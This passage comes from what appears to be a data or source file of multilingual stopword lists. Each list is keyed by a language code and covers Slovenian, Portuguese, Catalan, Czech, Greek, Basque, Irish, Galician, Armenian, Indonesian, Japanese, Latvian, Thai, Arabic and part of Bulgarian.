"brez",
"c",
"cel",
"cela",
"celi",
"celo",
"d",
"da",
"daleč",
"dan",
"danes",
"datum",
"december",
"deset",
"deseta",
"deseti",
"deseto",
"devet",
"deveta",
"deveti",
"deveto",
"do",
"dober",
"dobra",
"dobri",
"dobro",
"dokler",
"dol",
"dolg",
"dolga",
"dolgi",
"dovolj",
"drug",
"druga",
"drugi",
"drugo",
"dva",
"dve",
"e",
"eden",
"en",
"ena",
"ene",
"eni",
"enkrat",
"eno",
"etc.",
"f",
"februar",
"g",
"g.",
"ga",
"ga.",
"gor",
"gospa",
"gospod",
"h",
"halo",
"i",
"idr.",
"ii",
"iii",
"in",
"iv",
"ix",
"iz",
"j",
"januar",
"jaz",
"je",
"ji",
"jih",
"jim",
"jo",
"julij",
"junij",
"jutri",
"k",
"kadarkoli",
"kaj",
"kajti",
"kako",
"kakor",
"kamor",
"kamorkoli",
"kar",
"karkoli",
"katerikoli",
"kdaj",
"kdo",
"kdorkoli",
"ker",
"ki",
"kje",
"kjer",
"kjerkoli",
"ko",
"koder",
"koderkoli",
"koga",
"komu",
"kot",
"kratek",
"kratka",
"kratke",
"kratki",
"l",
"lahka",
"lahke",
"lahki",
"lahko",
"le",
"lep",
"lepa",
"lepe",
"lepi",
"lepo",
"leto",
"m",
"maj",
"majhen",
"majhna",
"majhni",
"malce",
"malo",
"manj",
"marec",
"me",
"med",
"medtem",
"mene",
"mesec",
"mi",
"midva",
"midve",
"mnogo",
"moj",
"moja",
"moje",
"mora",
"morajo",
"moram",
"moramo",
"morate",
"moraš",
"morem",
"mu",
"n",
"na",
"nad",
"naj",
"najina",
"najino",
"najmanj",
"naju",
"največ",
"nam",
"narobe",
"nas",
"nato",
"nazaj",
"naš",
"naša",
"naše",
"ne",
"nedavno",
"nedelja",
"nek",
"neka",
"nekaj",
"nekatere",
"nekateri",
"nekatero",
"nekdo",
"neke",
"nekega",
"neki",
"nekje",
"neko",
"nekoga",
"nekoč",
"ni",
"nikamor",
"nikdar",
"nikjer",
"nikoli",
"nič",
"nje",
"njega",
"njegov",
"njegova",
"njegovo",
"njej",
"njemu",
"njen",
"njena",
"njeno",
"nji",
"njih",
"njihov",
"njihova",
"njihovo",
"njiju",
"njim",
"njo",
"njun",
"njuna",
"njuno",
"no",
"nocoj",
"november",
"npr.",
"o",
"ob",
"oba",
"obe",
"oboje",
"od",
"odprt",
"odprta",
"odprti",
"okoli",
"oktober",
"on",
"onadva",
"one",
"oni",
"onidve",
"osem",
"osma",
"osmi",
"osmo",
"oz.",
"p",
"pa",
"pet",
"peta",
"petek",
"peti",
"peto",
"po",
"pod",
"pogosto",
"poleg",
"poln",
"polna",
"polni",
"polno",
"ponavadi",
"ponedeljek",
"ponovno",
"potem",
"povsod",
"pozdravljen",
"pozdravljeni",
"prav",
"prava",
"prave",
"pravi",
"pravo",
"prazen",
"prazna",
"prazno",
"prbl.",
"precej",
"pred",
"prej",
"preko",
"pri",
"pribl.",
"približno",
"primer",
"pripravljen",
"pripravljena",
"pripravljeni",
"proti",
"prva",
"prvi",
"prvo",
"r",
"ravno",
"redko",
"res",
"reč",
"s",
"saj",
"sam",
"sama",
"same",
"sami",
"samo",
"se",
"sebe",
"sebi",
"sedaj",
"sedem",
"sedma",
"sedmi",
"sedmo",
"sem",
"september",
"seveda",
"si",
"sicer",
"skoraj",
"skozi",
"slab",
"smo",
"so",
"sobota",
"spet",
"sreda",
"srednja",
"srednji",
"sta",
"ste",
"stran",
"stvar",
"sva",
"t",
"ta",
"tak",
"taka",
"take",
"taki",
"tako",
"takoj",
"tam",
"te",
"tebe",
"tebi",
"tega",
"težak",
"težka",
"težki",
"težko",
"ti",
"tista",
"tiste",
"tisti",
"tisto",
"tj.",
"tja",
"to",
"toda",
"torek",
"tretja",
"tretje",
"tretji",
"tri",
"tu",
"tudi",
"tukaj",
"tvoj",
"tvoja",
"tvoje",
"u",
"v",
"vaju",
"vam",
"vas",
"vaš",
"vaša",
"vaše",
"ve",
"vedno",
"velik",
"velika",
"veliki",
"veliko",
"vendar",
"ves",
"več",
"vi",
"vidva",
"vii",
"viii",
"visok",
"visoka",
"visoke",
"visoki",
"vsa",
"vsaj",
"vsak",
"vsaka",
"vsakdo",
"vsake",
"vsaki",
"vsakomur",
"vse",
"vsega",
"vsi",
"vso",
"včasih",
"včeraj",
"x",
"z",
"za",
"zadaj",
"zadnji",
"zakaj",
"zaprta",
"zaprti",
"zaprto",
"zdaj",
"zelo",
"zunaj",
"č",
"če",
"često",
"četrta",
"četrtek",
"četrti",
"četrto",
"čez",
"čigav",
"š",
"šest",
"šesta",
"šesti",
"šesto",
"štiri",
"ž",
"že",
],
"br": [
"a",
"ainda",
"alem",
"ambas",
"ambos",
"antes",
"ao",
"aonde",
"aos",
"apos",
"aquele",
"aqueles",
"as",
"assim",
"com",
"como",
"contra",
"contudo",
"cuja",
"cujas",
"cujo",
"cujos",
"da",
"das",
"de",
"dela",
"dele",
"deles",
"demais",
"depois",
"desde",
"desta",
"deste",
"dispoe",
"dispoem",
"diversa",
"diversas",
"diversos",
"do",
"dos",
"durante",
"e",
"ela",
"elas",
"ele",
"eles",
"em",
"entao",
"entre",
"essa",
"essas",
"esse",
"esses",
"esta",
"estas",
"este",
"estes",
"ha",
"isso",
"isto",
"logo",
"mais",
"mas",
"mediante",
"menos",
"mesma",
"mesmas",
"mesmo",
"mesmos",
"na",
"nao",
"nas",
"nem",
"nesse",
"neste",
"nos",
"o",
"os",
"ou",
"outra",
"outras",
"outro",
"outros",
"pelas",
"pelo",
"pelos",
"perante",
"pois",
"por",
"porque",
"portanto",
"propios",
"proprio",
"quais",
"qual",
"qualquer",
"quando",
"quanto",
"que",
"quem",
"quer",
"se",
"seja",
"sem",
"sendo",
"seu",
"seus",
"sob",
"sobre",
"sua",
"suas",
"tal",
"tambem",
"teu",
"teus",
"toda",
"todas",
"todo",
"todos",
"tua",
"tuas",
"tudo",
"um",
"uma",
"umas",
"uns",
],
"ca": [
"a",
"abans",
"ací",
"ah",
"així",
"això",
"al",
"aleshores",
"algun",
"alguna",
"algunes",
"alguns",
"alhora",
"allà",
"allí",
"allò",
"als",
"altra",
"altre",
"altres",
"amb",
"ambdues",
"ambdós",
"apa",
"aquell",
"aquella",
"aquelles",
"aquells",
"aquest",
"aquesta",
"aquestes",
"aquests",
"aquí",
"baix",
"cada",
"cadascuna",
"cadascunes",
"cadascuns",
"cadascú",
"com",
"contra",
"d'un",
"d'una",
"d'unes",
"d'uns",
"dalt",
"de",
"del",
"dels",
"des",
"després",
"dins",
"dintre",
"donat",
"doncs",
"durant",
"e",
"eh",
"el",
"els",
"em",
"en",
"encara",
"ens",
"entre",
"eren",
"es",
"esta",
"estaven",
"esteu",
"està",
"estàvem",
"estàveu",
"et",
"etc",
"ets",
"fins",
"fora",
"gairebé",
"ha",
"han",
"has",
"havia",
"he",
"hem",
"heu",
"hi",
"ho",
"i",
"igual",
"iguals",
"ja",
"l'hi",
"la",
"les",
"li",
"li'n",
"llavors",
"m'he",
"ma",
"mal",
"malgrat",
"mateix",
"mateixa",
"mateixes",
"mateixos",
"me",
"mentre",
"meu",
"meus",
"meva",
"meves",
"molt",
"molta",
"moltes",
"molts",
"mon",
"mons",
"més",
"n'he",
"n'hi",
"ne",
"ni",
"no",
"nogensmenys",
"només",
"nosaltres",
"nostra",
"nostre",
"nostres",
"o",
"oh",
"oi",
"on",
"pas",
"pel",
"pels",
"per",
"perquè",
"però",
"poc",
"poca",
"pocs",
"poques",
"potser",
"propi",
"qual",
"quals",
"quan",
"quant",
"que",
"quelcom",
"qui",
"quin",
"quina",
"quines",
"quins",
"què",
"s'ha",
"s'han",
"sa",
"semblant",
"semblants",
"ses",
"seu",
"seus",
"seva",
"seves",
"si",
"sobre",
"sobretot",
"solament",
"sols",
"son",
"sons",
"sota",
"sou",
"sóc",
"són",
"t'ha",
"t'han",
"t'he",
"ta",
"tal",
"també",
"tampoc",
"tan",
"tant",
"tanta",
"tantes",
"teu",
"teus",
"teva",
"teves",
"ton",
"tons",
"tot",
"tota",
"totes",
"tots",
"un",
"una",
"unes",
"uns",
"us",
"va",
"vaig",
"vam",
"van",
"vas",
"veu",
"vosaltres",
"vostra",
"vostre",
"vostres",
"érem",
"éreu",
"és",
],
"cs": [
"a",
"aby",
"ahoj",
"aj",
"ale",
"anebo",
"ani",
"ano",
"asi",
"aspoň",
"atd",
"atp",
"ačkoli",
"až",
"bez",
"beze",
"blízko",
"bohužel",
"brzo",
"bude",
"budem",
"budeme",
"budete",
"budeš",
"budou",
"budu",
"by",
"byl",
"byla",
"byli",
"bylo",
"byly",
"bys",
"být",
"během",
"chce",
"chceme",
"chcete",
"chceš",
"chci",
"chtít",
"chtějí",
"chut'",
"chuti",
"co",
"což",
"cz",
"daleko",
"další",
"den",
"deset",
"devatenáct",
"devět",
"dnes",
"do",
"dobrý",
"docela",
"dva",
"dvacet",
"dvanáct",
"dvě",
"dál",
"dále",
"děkovat",
"děkujeme",
"děkuji",
"ho",
"hodně",
"i",
"jak",
"jakmile",
"jako",
"jakož",
"jde",
"je",
"jeden",
"jedenáct",
"jedna",
"jedno",
"jednou",
"jedou",
"jeho",
"jehož",
"jej",
"jejich",
"její",
"jelikož",
"jemu",
"jen",
"jenom",
"jestli",
"jestliže",
"ještě",
"jež",
"ji",
"jich",
"jimi",
"jinak",
"jiné",
"již",
"jsem",
"jseš",
"jsi",
"jsme",
"jsou",
"jste",
"já",
"jí",
"jím",
"jíž",
"k",
"kam",
"kde",
"kdo",
"kdy",
"když",
"ke",
"kolik",
"kromě",
"kterou",
"která",
"které",
"který",
"kteří",
"kvůli",
"mají",
"mezi",
"mi",
"mne",
"mnou",
"mně",
"moc",
"mohl",
"mohou",
"moje",
"moji",
"možná",
"musí",
"my",
"má",
"málo",
"mám",
"máme",
"máte",
"máš",
"mé",
"mí",
"mít",
"mě",
"můj",
"může",
"na",
"nad",
"nade",
"napište",
"naproti",
"načež",
"naše",
"naši",
"ne",
"nebo",
"nebyl",
"nebyla",
"nebyli",
"nebyly",
"nedělají",
"nedělá",
"nedělám",
"neděláme",
"neděláte",
"neděláš",
"neg",
"nejsi",
"nejsou",
"nemají",
"nemáme",
"nemáte",
"neměl",
"není",
"nestačí",
"nevadí",
"než",
"nic",
"nich",
"nimi",
"nové",
"nový",
"nula",
"nám",
"námi",
"nás",
"náš",
"ním",
"ně",
"něco",
"nějak",
"někde",
"někdo",
"němu",
"němuž",
"o",
"od",
"ode",
"on",
"ona",
"oni",
"ono",
"ony",
"osm",
"osmnáct",
"pak",
"patnáct",
"po",
"pod",
"podle",
"pokud",
"potom",
"pouze",
"pozdě",
"pořád",
"pravé",
"pro",
"prostě",
"prosím",
"proti",
"proto",
"protože",
"proč",
"první",
"pta",
"pět",
"před",
"přes",
"přese",
"při",
"přičemž",
"re",
"rovně",
"s",
"se",
"sedm",
"sedmnáct",
"si",
"skoro",
"smí",
"smějí",
"snad",
"spolu",
"sta",
"sto",
"strana",
"sté",
"své",
"svých",
"svým",
"svými",
"ta",
"tady",
"tak",
"takhle",
"taky",
"také",
"takže",
"tam",
"tamhle",
"tamhleto",
"tamto",
"tato",
"tebe",
"tebou",
"ted'",
"tedy",
"ten",
"tento",
"teto",
"ti",
"tipy",
"tisíc",
"tisíce",
"to",
"tobě",
"tohle",
"toho",
"tohoto",
"tom",
"tomto",
"tomu",
"tomuto",
"toto",
"trošku",
"tu",
"tuto",
"tvoje",
"tvá",
"tvé",
"tvůj",
"ty",
"tyto",
"téma",
"tím",
"tímto",
"tě",
"těm",
"těmu",
"třeba",
"tři",
"třináct",
"u",
"určitě",
"už",
"v",
"vaše",
"vaši",
"ve",
"vedle",
"večer",
"vlastně",
"vy",
"vám",
"vámi",
"vás",
"váš",
"více",
"však",
"všechno",
"všichni",
"vůbec",
"vždy",
"z",
"za",
"zatímco",
"zač",
"zda",
"zde",
"ze",
"zprávy",
"zpět",
"čau",
"či",
"článku",
"články",
"čtrnáct",
"čtyři",
"šest",
"šestnáct",
"že",
],
"el": [
"αλλα",
"αν",
"αντι",
"απο",
"αυτα",
"αυτεσ",
"αυτη",
"αυτο",
"αυτοι",
"αυτοσ",
"αυτουσ",
"αυτων",
"για",
"δε",
"δεν",
"εαν",
"ειμαι",
"ειμαστε",
"ειναι",
"εισαι",
"ειστε",
"εκεινα",
"εκεινεσ",
"εκεινη",
"εκεινο",
"εκεινοι",
"εκεινοσ",
"εκεινουσ",
"εκεινων",
"ενω",
"επι",
"η",
"θα",
"ισωσ",
"κ",
"και",
"κατα",
"κι",
"μα",
"με",
"μετα",
"μη",
"μην",
"να",
"ο",
"οι",
"ομωσ",
"οπωσ",
"οσο",
"οτι",
"παρα",
"ποια",
"ποιεσ",
"ποιο",
"ποιοι",
"ποιοσ",
"ποιουσ",
"ποιων",
"που",
"προσ",
"πωσ",
"σε",
"στη",
"στην",
"στο",
"στον",
"τα",
"την",
"τησ",
"το",
"τον",
"τοτε",
"του",
"των",
"ωσ",
],
"eu": [
"al",
"anitz",
"arabera",
"asko",
"baina",
"bat",
"batean",
"batek",
"bati",
"batzuei",
"batzuek",
"batzuetan",
"batzuk",
"bera",
"beraiek",
"berau",
"berauek",
"bere",
"berori",
"beroriek",
"beste",
"bezala",
"da",
"dago",
"dira",
"ditu",
"du",
"dute",
"edo",
"egin",
"ere",
"eta",
"eurak",
"ez",
"gainera",
"gu",
"gutxi",
"guzti",
"haiei",
"haiek",
"haietan",
"hainbeste",
"hala",
"han",
"handik",
"hango",
"hara",
"hari",
"hark",
"hartan",
"hau",
"hauei",
"hauek",
"hauetan",
"hemen",
"hemendik",
"hemengo",
"hi",
"hona",
"honek",
"honela",
"honetan",
"honi",
"hor",
"hori",
"horiei",
"horiek",
"horietan",
"horko",
"horra",
"horrek",
"horrela",
"horretan",
"horri",
"hortik",
"hura",
"izan",
"ni",
"noiz",
"nola",
"non",
"nondik",
"nongo",
"nor",
"nora",
"ze",
"zein",
"zen",
"zenbait",
"zenbat",
"zer",
"zergatik",
"ziren",
"zituen",
"zu",
"zuek",
"zuen",
"zuten",
],
"ga": [
"a",
"ach",
"ag",
"agus",
"an",
"aon",
"ar",
"arna",
"as",
"b'",
"ba",
"beirt",
"bhúr",
"caoga",
"ceathair",
"ceathrar",
"chomh",
"chtó",
"chuig",
"chun",
"cois",
"céad",
"cúig",
"cúigear",
"d'",
"daichead",
"dar",
"de",
"deich",
"deichniúr",
"den",
"dhá",
"do",
"don",
"dtí",
"dá",
"dár",
"dó",
"faoi",
"faoin",
"faoina",
"faoinár",
"fara",
"fiche",
"gach",
"gan",
"go",
"gur",
"haon",
"hocht",
"i",
"iad",
"idir",
"in",
"ina",
"ins",
"inár",
"is",
"le",
"leis",
"lena",
"lenár",
"m'",
"mar",
"mo",
"mé",
"na",
"nach",
"naoi",
"naonúr",
"ná",
"ní",
"níor",
"nó",
"nócha",
"ocht",
"ochtar",
"os",
"roimh",
"sa",
"seacht",
"seachtar",
"seachtó",
"seasca",
"seisear",
"siad",
"sibh",
"sinn",
"sna",
"sé",
"sí",
"tar",
"thar",
"thú",
"triúr",
"trí",
"trína",
"trínár",
"tríocha",
"tú",
"um",
"ár",
"é",
"éis",
"í",
"ó",
"ón",
"óna",
"ónár",
],
"gl": [
"a",
"alí",
"ao",
"aos",
"aquel",
"aquela",
"aquelas",
"aqueles",
"aquilo",
"aquí",
"as",
"así",
"aínda",
"ben",
"cando",
"che",
"co",
"coa",
"coas",
"comigo",
"con",
"connosco",
"contigo",
"convosco",
"cos",
"cun",
"cunha",
"cunhas",
"cuns",
"da",
"dalgunha",
"dalgunhas",
"dalgún",
"dalgúns",
"das",
"de",
"del",
"dela",
"delas",
"deles",
"desde",
"deste",
"do",
"dos",
"dun",
"dunha",
"dunhas",
"duns",
"e",
"el",
"ela",
"elas",
"eles",
"en",
"era",
"eran",
"esa",
"esas",
"ese",
"eses",
"esta",
"estaba",
"estar",
"este",
"estes",
"estiven",
"estou",
"está",
"están",
"eu",
"facer",
"foi",
"foron",
"fun",
"había",
"hai",
"iso",
"isto",
"la",
"las",
"lle",
"lles",
"lo",
"los",
"mais",
"me",
"meu",
"meus",
"min",
"miña",
"miñas",
"moi",
"na",
"nas",
"neste",
"nin",
"no",
"non",
"nos",
"nosa",
"nosas",
"noso",
"nosos",
"nun",
"nunha",
"nunhas",
"nuns",
"nós",
"o",
"os",
"ou",
"para",
"pero",
"pode",
"pois",
"pola",
"polas",
"polo",
"polos",
"por",
"que",
"se",
"senón",
"ser",
"seu",
"seus",
"sexa",
"sido",
"sobre",
"súa",
"súas",
"tamén",
"tan",
"te",
"ten",
"ter",
"teu",
"teus",
"teñen",
"teño",
"ti",
"tido",
"tiven",
"tiña",
"túa",
"túas",
"un",
"unha",
"unhas",
"uns",
"vos",
"vosa",
"vosas",
"voso",
"vosos",
"vós",
"á",
"é",
"ó",
"ós",
],
"hy": [
"այդ",
"այլ",
"այն",
"այս",
"դու",
"դուք",
"եմ",
"են",
"ենք",
"ես",
"եք",
"է",
"էի",
"էին",
"էինք",
"էիր",
"էիք",
"էր",
"ըստ",
"թ",
"ի",
"ին",
"իսկ",
"իր",
"կամ",
"համար",
"հետ",
"հետո",
"մենք",
"մեջ",
"մի",
"ն",
"նա",
"նաև",
"նրա",
"նրանք",
"որ",
"որը",
"որոնք",
"որպես",
"ու",
"ում",
"պիտի",
"վրա",
"և",
],
"id": [
"ada",
"adalah",
"adanya",
"adapun",
"agak",
"agaknya",
"agar",
"akan",
"akankah",
"akhirnya",
"aku",
"akulah",
"amat",
"amatlah",
"anda",
"andalah",
"antar",
"antara",
"antaranya",
"apa",
"apaan",
"apabila",
"apakah",
"apalagi",
"apatah",
"atau",
"ataukah",
"ataupun",
"bagai",
"bagaikan",
"bagaimana",
"bagaimanakah",
"bagaimanapun",
"bagi",
"bahkan",
"bahwa",
"bahwasanya",
"banyak",
"beberapa",
"begini",
"beginian",
"beginikah",
"beginilah",
"begitu",
"begitukah",
"begitulah",
"begitupun",
"belum",
"belumlah",
"berapa",
"berapakah",
"berapalah",
"berapapun",
"bermacam",
"bersama",
"betulkah",
"biasa",
"biasanya",
"bila",
"bilakah",
"bisa",
"bisakah",
"boleh",
"bolehkah",
"bolehlah",
"buat",
"bukan",
"bukankah",
"bukanlah",
"bukannya",
"cuma",
"dahulu",
"dalam",
"dan",
"dapat",
"dari",
"daripada",
"dekat",
"demi",
"demikian",
"demikianlah",
"dengan",
"depan",
"di",
"dia",
"dialah",
"diantara",
"diantaranya",
"dikarenakan",
"dini",
"diri",
"dirinya",
"disini",
"disinilah",
"dong",
"dulu",
"enggak",
"enggaknya",
"entah",
"entahlah",
"hal",
"hampir",
"hanya",
"hanyalah",
"harus",
"haruslah",
"harusnya",
"hendak",
"hendaklah",
"hendaknya",
"hingga",
"ia",
"ialah",
"ibarat",
"ingin",
"inginkah",
"inginkan",
"ini",
"inikah",
"inilah",
"itu",
"itukah",
"itulah",
"jangan",
"jangankan",
"janganlah",
"jika",
"jikalau",
"juga",
"justru",
"kala",
"kalau",
"kalaulah",
"kalaupun",
"kalian",
"kami",
"kamilah",
"kamu",
"kamulah",
"kan",
"kapan",
"kapankah",
"kapanpun",
"karena",
"karenanya",
"ke",
"kecil",
"kemudian",
"kenapa",
"kepada",
"kepadanya",
"ketika",
"khususnya",
"kini",
"kinilah",
"kiranya",
"kita",
"kitalah",
"kok",
"lagi",
"lagian",
"lah",
"lain",
"lainnya",
"lalu",
"lama",
"lamanya",
"lebih",
"macam",
"maka",
"makanya",
"makin",
"malah",
"malahan",
"mampu",
"mampukah",
"mana",
"manakala",
"manalagi",
"masih",
"masihkah",
"masing",
"mau",
"maupun",
"melainkan",
"melalui",
"memang",
"mengapa",
"mereka",
"merekalah",
"merupakan",
"meski",
"meskipun",
"mungkin",
"mungkinkah",
"nah",
"namun",
"nanti",
"nantinya",
"nyaris",
"oleh",
"olehnya",
"pada",
"padahal",
"padanya",
"paling",
"pantas",
"para",
"pasti",
"pastilah",
"per",
"percuma",
"pernah",
"pula",
"pun",
"rupanya",
"saat",
"saatnya",
"saja",
"sajalah",
"saling",
"sama",
"sambil",
"sampai",
"sana",
"sangat",
"sangatlah",
"saya",
"sayalah",
"se",
"sebab",
"sebabnya",
"sebagai",
"sebagaimana",
"sebagainya",
"sebaliknya",
"sebanyak",
"sebegini",
"sebegitu",
"sebelum",
"sebelumnya",
"sebenarnya",
"seberapa",
"sebetulnya",
"sebisanya",
"sebuah",
"sedang",
"sedangkan",
"sedemikian",
"sedikit",
"sedikitnya",
"segala",
"segalanya",
"segera",
"seharusnya",
"sehingga",
"sejak",
"sejenak",
"sekali",
"sekalian",
"sekaligus",
"sekalipun",
"sekarang",
"seketika",
"sekiranya",
"sekitar",
"sekitarnya",
"sela",
"selagi",
"selain",
"selaku",
"selalu",
"selama",
"selamanya",
"seluruh",
"seluruhnya",
"semacam",
"semakin",
"semasih",
"semaunya",
"sementara",
"sempat",
"semua",
"semuanya",
"semula",
"sendiri",
"sendirinya",
"seolah",
"seorang",
"sepanjang",
"sepantasnya",
"sepantasnyalah",
"seperti",
"sepertinya",
"sering",
"seringnya",
"serta",
"serupa",
"sesaat",
"sesama",
"sesegera",
"sesekali",
"seseorang",
"sesuatu",
"sesuatunya",
"sesudah",
"sesudahnya",
"setelah",
"seterusnya",
"setiap",
"setidaknya",
"sewaktu",
"siapa",
"siapakah",
"siapapun",
"sini",
"sinilah",
"suatu",
"sudah",
"sudahkah",
"sudahlah",
"supaya",
"tadi",
"tadinya",
"tak",
"tanpa",
"tapi",
"telah",
"tentang",
"tentu",
"tentulah",
"tentunya",
"terdiri",
"terhadap",
"terhadapnya",
"terlalu",
"terlebih",
"tersebut",
"tersebutlah",
"tertentu",
"tetapi",
"tiap",
"tidak",
"tidakkah",
"tidaklah",
"toh",
"waduh",
"wah",
"wahai",
"walau",
"walaupun",
"wong",
"yaitu",
"yakni",
"yang",
],
"ja": [
"あっ",
"あり",
"ある",
"い",
"いう",
"いる",
"う",
"うち",
"お",
"および",
"おり",
"か",
"かつて",
"から",
"が",
"き",
"ここ",
"こと",
"この",
"これ",
"これら",
"さ",
"さらに",
"し",
"しかし",
"する",
"ず",
"せ",
"せる",
"そして",
"その",
"その他",
"その後",
"それ",
"それぞれ",
"た",
"ただし",
"たち",
"ため",
"たり",
"だ",
"だっ",
"つ",
"て",
"で",
"でき",
"できる",
"です",
"では",
"でも",
"と",
"という",
"といった",
"とき",
"ところ",
"として",
"とともに",
"とも",
"と共に",
"な",
"ない",
"なお",
"なかっ",
"ながら",
"なく",
"なっ",
"など",
"なら",
"なり",
"なる",
"に",
"において",
"における",
"について",
"にて",
"によって",
"により",
"による",
"に対して",
"に対する",
"に関する",
"の",
"ので",
"のみ",
"は",
"ば",
"へ",
"ほか",
"ほとんど",
"ほど",
"ます",
"また",
"または",
"まで",
"も",
"もの",
"ものの",
"や",
"よう",
"より",
"ら",
"られ",
"られる",
"れ",
"れる",
"を",
"ん",
"及び",
"特に",
],
"lv": [
"aiz",
"ap",
"apakš",
"apakšpus",
"ar",
"arī",
"augšpus",
"bet",
"bez",
"bija",
"biji",
"biju",
"bijām",
"bijāt",
"būs",
"būsi",
"būsiet",
"būsim",
"būt",
"būšu",
"caur",
"diemžēl",
"diezin",
"droši",
"dēļ",
"esam",
"esat",
"esi",
"esmu",
"gan",
"gar",
"iekam",
"iekams",
"iekām",
"iekāms",
"iekš",
"iekšpus",
"ik",
"ir",
"it",
"itin",
"iz",
"ja",
"jau",
"jeb",
"jebšu",
"jel",
"jo",
"jā",
"ka",
"kamēr",
"kaut",
"kolīdz",
"kopš",
"kā",
"kļuva",
"kļuvi",
"kļuvu",
"kļuvām",
"kļuvāt",
"kļūs",
"kļūsi",
"kļūsiet",
"kļūsim",
"kļūst",
"kļūstam",
"kļūstat",
"kļūsti",
"kļūstu",
"kļūt",
"kļūšu",
"labad",
"lai",
"lejpus",
"līdz",
"līdzko",
"ne",
"nebūt",
"nedz",
"nekā",
"nevis",
"nezin",
"no",
"nu",
"nē",
"otrpus",
"pa",
"par",
"pat",
"pie",
"pirms",
"pret",
"priekš",
"pār",
"pēc",
"starp",
"tad",
"tak",
"tapi",
"taps",
"tapsi",
"tapsiet",
"tapsim",
"tapt",
"tapāt",
"tapšu",
"taču",
"te",
"tiec",
"tiek",
"tiekam",
"tiekat",
"tieku",
"tik",
"tika",
"tikai",
"tiki",
"tikko",
"tiklab",
"tiklīdz",
"tiks",
"tiksiet",
"tiksim",
"tikt",
"tiku",
"tikvien",
"tikām",
"tikāt",
"tikšu",
"tomēr",
"topat",
"turpretim",
"turpretī",
"tā",
"tādēļ",
"tālab",
"tāpēc",
"un",
"uz",
"vai",
"var",
"varat",
"varēja",
"varēji",
"varēju",
"varējām",
"varējāt",
"varēs",
"varēsi",
"varēsiet",
"varēsim",
"varēt",
"varēšu",
"vien",
"virs",
"virspus",
"vis",
"viņpus",
"zem",
"ārpus",
"šaipus",
],
"th": [
"กล่าว",
"กว่า",
"กัน",
"กับ",
"การ",
"ก็",
"ก่อน",
"ขณะ",
"ขอ",
"ของ",
"ขึ้น",
"คง",
"ครั้ง",
"ความ",
"คือ",
"จะ",
"จัด",
"จาก",
"จึง",
"ช่วง",
"ซึ่ง",
"ดัง",
"ด้วย",
"ด้าน",
"ตั้ง",
"ตั้งแต่",
"ตาม",
"ต่อ",
"ต่าง",
"ต่างๆ",
"ต้อง",
"ถึง",
"ถูก",
"ถ้า",
"ทั้ง",
"ทั้งนี้",
"ทาง",
"ที่",
"ที่สุด",
"ทุก",
"ทํา",
"ทําให้",
"นอกจาก",
"นัก",
"นั้น",
"นี้",
"น่า",
"นํา",
"บาง",
"ผล",
"ผ่าน",
"พบ",
"พร้อม",
"มา",
"มาก",
"มี",
"ยัง",
"รวม",
"ระหว่าง",
"รับ",
"ราย",
"ร่วม",
"ลง",
"วัน",
"ว่า",
"สุด",
"ส่ง",
"ส่วน",
"สําหรับ",
"หนึ่ง",
"หรือ",
"หลัง",
"หลังจาก",
"หลาย",
"หาก",
"อยาก",
"อยู่",
"อย่าง",
"ออก",
"อะไร",
"อาจ",
"อีก",
"เขา",
"เข้า",
"เคย",
"เฉพาะ",
"เช่น",
"เดียว",
"เดียวกัน",
"เนื่องจาก",
"เปิด",
"เปิดเผย",
"เป็น",
"เป็นการ",
"เพราะ",
"เพื่อ",
"เมื่อ",
"เรา",
"เริ่ม",
"เลย",
"เห็น",
"เอง",
"แต่",
"แบบ",
"แรก",
"และ",
"แล้ว",
"แห่ง",
"โดย",
"ใน",
"ให้",
"ได้",
"ไป",
"ไม่",
"ไว้",
],
"ar": [
"،",
"أ",
"ا",
"اثر",
"اجل",
"احد",
"اخرى",
"اذا",
"اربعة",
"اطار",
"اعادة",
"اعلنت",
"اف",
"اكثر",
"اكد",
"الا",
"الاخيرة",
"الان",
"الاول",
"الاولى",
"التى",
"التي",
"الثاني",
"الثانية",
"الذاتي",
"الذى",
"الذي",
"الذين",
"السابق",
"الف",
"الماضي",
"المقبل",
"الوقت",
"الى",
"اليوم",
"اما",
"امام",
"امس",
"ان",
"انه",
"انها",
"او",
"اول",
"اي",
"ايار",
"ايام",
"ايضا",
"ب",
"باسم",
"بان",
"برس",
"بسبب",
"بشكل",
"بعد",
"بعض",
"بن",
"به",
"بها",
"بين",
"تم",
"ثلاثة",
"ثم",
"جميع",
"حاليا",
"حتى",
"حوالى",
"حول",
"حيث",
"حين",
"خلال",
"دون",
"ذلك",
"زيارة",
"سنة",
"سنوات",
"شخصا",
"صباح",
"صفر",
"ضد",
"ضمن",
"عام",
"عاما",
"عدة",
"عدد",
"عدم",
"عشر",
"عشرة",
"على",
"عليه",
"عليها",
"عن",
"عند",
"عندما",
"غدا",
"غير",
"ـ",
"ف",
"فان",
"فى",
"في",
"فيه",
"فيها",
"قال",
"قبل",
"قد",
"قوة",
"كان",
"كانت",
"كل",
"كلم",
"كما",
"لا",
"لدى",
"لقاء",
"لكن",
"للامم",
"لم",
"لن",
"له",
"لها",
"لوكالة",
"ما",
"مايو",
"مساء",
"مع",
"مقابل",
"مليار",
"مليون",
"من",
"منذ",
"منها",
"نحو",
"نفسه",
"نهاية",
"هذا",
"هذه",
"هناك",
"هو",
"هي",
"و",
"و6",
"واحد",
"واضاف",
"واضافت",
"واكد",
"وان",
"واوضح",
"وفي",
"وقال",
"وقالت",
"وقد",
"وقف",
"وكان",
"وكانت",
"ولا",
"ولم",
"ومن",
"وهو",
"وهي",
"يكون",
"يمكن",
"يوم",
],
"bg": [
"а",
"автентичен",
"аз",
"ако",
"ала",
"бе",
"без",
"беше",
"би",
"бивш",
"бивша",
"бившо",
"бил",
"била",
"били",
"било",
"благодаря",
"близо",
"бъдат",
"бъде",
"бяха",
"в",
"вас",
"ваш",
"ваша",
"вероятно",
"вече",
"взема",
"ви",
"вие",
"винаги",
"внимава",
"време",
"все",
"всеки",
"всички",
"всичко",
"всяка",
"във",
"въпреки",
"върху",
"г",
"ги",
"главен",
"главна",
"главно",
"глас",
"го",
"година",
"години",
"годишен",
"д",
"да",
"дали",
"два",
"двама",
"двамата",
"две",
"двете",
"ден",
"днес",
"дни",
"до",
"добра",
"добре",
"добро",
"добър",
"докато",
"докога",
"дори",
"досега",
"доста",
"друг",
"друга",
"други",
"е",
"евтин",
"едва",
"един",
"една",
"еднаква",
"еднакви",
"еднакъв",
"едно",
"екип",
"ето",
"живот",
"за",
"забавям",
"зад",
"заедно",
"заради",
"засега",
"заспал",
"затова",
"защо",
"защото",
"и",
"из",
"или",
"им",
"има",
"имат",
"иска",
"й",
"каза",
"как",
"каква",
"какво",
"както",
"какъв",
"като",
"кога",
"когато",
"което",
"които",
